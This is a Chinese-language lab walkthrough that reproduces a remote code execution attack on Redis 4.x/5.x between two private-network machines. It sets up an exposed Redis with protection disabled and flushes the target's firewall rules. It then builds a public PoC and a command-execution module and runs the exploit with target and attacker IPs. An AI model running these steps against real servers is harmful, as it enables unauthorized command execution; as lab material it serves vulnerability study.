攻击机：centos mini 192.168.205.130

靶机：centos 192.168.205.128

影响范围：Redis4.x、5.x

0x01 安装redis包

wget download.redis.io/releases/redis-4.0.11.tar.gz

0x02 解压安装包

tar xzvf redis-4.0.11.tar.gz

目录下会新生成一个文件夹

yicunyiye@yicunyiye:~/redis$ ls
redis-4.0.11  redis-4.0.11.tar.gz

0x03 make安装

进入文件夹，在usr/local/redis目录下安装redis：

make PREFIX=/usr/local/redis install

0x04 修改redis.conf

cp /home/yicunyiye/redis/redis-4.0.11/redis.conf /usr/local/redis

修改conf文件

注释掉

#bind 127.0.0.1

修改为no，允许ip访问

protected-mode no

redis以后台方式启动

daemonize yes

0x04 服务端启动

在bin目录下

root@yicunyiye:/usr/local/redis/bin# ./redis-server /usr/local/redis/redis.conf
7901:C 07 Sep 19:22:17.689 # oO0OoO0OoO0Oo Redis is starting oO0OoO0OoO0Oo
7901:C 07 Sep 19:22:17.689 # Redis version=4.0.11, bits=64, commit=00000000, modified=0, pid=7901, just started
7901:C 07 Sep 19:22:17.689 # Configuration loaded

0x05 启动客户端并连接测试

./redis-cli

0x06 下载poc

git clone https://github.com/Ridter/redis-rce.git

0x07 下载RedisModules-ExecuteCommand

git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand.git

然后直接make

root@kali:~/redis-rce/RedisModules-ExecuteCommand# ls
RedisModules-ExecuteCommand
root@kali:~/redis-rce/RedisModules-ExecuteCommand# cd RedisModules-ExecuteCommand/
root@kali:~/redis-rce/RedisModules-ExecuteCommand/RedisModules-ExecuteCommand# make

然后将/src下的modules.so文件复制到poc目录下

0x08 poc出现的一些问题

出现了

No route to host

解决办法：

关闭iptables

service iptables stop

或者清理规则

iptables -F

注：这里是在靶机上执行关闭防火墙

运行发现缺少six库

先安装pip

curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py

会在目录下生成一个get-pip.py

python get-pip.py

再安装

pip install six

运行poc

python redis-rce.py -r 192.168.205.128 -L 192.168.205.130 -f module.so

-r 目标ip -L本机ip